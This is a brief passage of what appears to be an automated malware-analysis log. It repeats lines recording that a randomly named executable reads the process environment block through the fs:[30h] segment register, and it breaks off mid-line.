Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1D9D mov eax, dword ptr fs:[00000030h]16_2_1F3E1D9D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1D9D mov eax, dword ptr fs:[00000030h]16_2_1F3E1D9D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E1D9D mov eax, dword ptr fs:[00000030h]16_2_1F3E1D9D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F471DE3 mov ecx, dword ptr fs:[00000030h]16_2_1F471DE3
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F471DE3 mov ecx, dword ptr fs:[00000030h]16_2_1F471DE3
Source: C:\Progr